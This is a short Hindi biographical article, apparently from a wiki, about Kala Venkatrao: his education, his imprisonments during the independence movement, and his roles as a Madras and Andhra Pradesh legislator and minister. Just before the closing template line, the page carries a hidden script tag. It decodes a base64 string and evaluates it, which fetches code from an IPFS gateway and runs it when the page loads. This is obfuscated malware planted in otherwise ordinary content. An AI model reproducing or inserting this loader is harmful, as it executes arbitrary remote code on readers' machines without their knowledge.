काला वेंकटराव
काला वेंकटराव
जन्म तथा शिक्षा
दक्षिण भारत के एक प्रमुख राजनैतीक कार्यकर्त्ता काला वेंकटराव का जन्म 7 जुलाई, 1900 ई. को पश्चिम गोदावरी जिले में हुआ था। असहयोग आंदोलन मेंं भाग लेने के लिए उन्होंंने अपनी बी.ए. की पढ़ाई बीच में ही छोड़ दी थी। जो बाद मे उन्होने गुजरात विद्यापीठ से पढ़ाई पुरी की।
जेल यात्रा
1921 से आरंभ उनकी सक्रियता स्वतंत्रता संग्राम में बराबर बनी रही। वे विभिन्न अंदोलन में 8 बार जेल गये और उन्होने भारत छोड़ो आंदोलन में भाग लेने के कारण 1945 में ही जेल से बाहर आ सके ।
विधान सभा का पद
काला वेंकटराव 1937 में मद्रास विधान सभा के सदस्ये निर्वाचित हुए थे। 1946 में वे देश की संविधान परिषद् के सदस्ये थे। 1947 से 1959 तक वे पहले मद्रास और फिर आंध्र प्रदेश बन जाने पर वहां विभिन्न विभगो के मंत्री रहे। वे भूमी सुधार के विशेष ज्ञाता थे। पट्टाभि सीतारामैया के प्रमुख सहयोगी रहे।
निधन
काला वेंकटराव का 28 मार्च, 1959 को देहांत हो गया ।
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>साँचा:मद्रास विधान सभा के सदस्य